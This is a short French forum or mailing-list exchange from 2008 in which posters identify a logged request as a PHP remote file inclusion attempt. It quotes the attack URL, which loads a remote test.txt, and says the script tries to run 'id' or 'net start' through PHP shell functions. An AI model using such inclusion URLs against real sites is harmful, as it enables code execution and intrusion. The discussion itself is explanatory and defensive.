Le 25/09/2008 13:03, patpro ~ Patrick Proniewski a écrit :
http://urldemonsite/index.php?x=http://www.trosken.com/test.txt?
Quel est le rôle de ce fichier test.txt ?
Que cherchait on à faire ?
En général, c'est pour faire une injection de code PHP.
Oui. Il suffit d'ailleurs de regarder ce que contient ce fichier :
http://www.trosken.com/test.txt
On voit que le script essaye de lancer une commande « id » ou « net
start », via l'une des fonctions suivantes : exec, shell_exec, system,
passthru ou popen+fread (selon ce qui existe).